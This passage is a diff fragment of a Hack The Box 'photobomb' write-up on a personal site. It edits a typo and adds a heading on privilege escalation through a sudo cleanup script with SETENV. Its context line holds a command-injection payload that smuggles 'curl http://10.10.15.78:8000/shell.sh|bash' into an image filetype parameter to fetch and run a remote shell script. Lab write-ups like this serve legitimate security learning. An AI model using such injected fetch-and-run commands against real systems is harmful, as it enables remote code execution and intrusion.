blnknlights/blnknlights.github.io/htb/machines/photobomb/photobomb.md

 photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;curl%20http://10.10.15.78:8000/shell.sh|bash&dimensions=3000x2000cat ph
 ```

+## Exploring potential privilege escalation vectors

-once in the box wizard haaas sudo to a cleanup script with SETENV enabled, which means that we can bring environement variables over as we sudo
+once in the box wizard has sudo to a cleanup script with SETENV enabled, which means that we can bring environement variables over as we sudo
 ```bash
 $ sudo -l
 Matching Defaults entries for wizard on photobomb: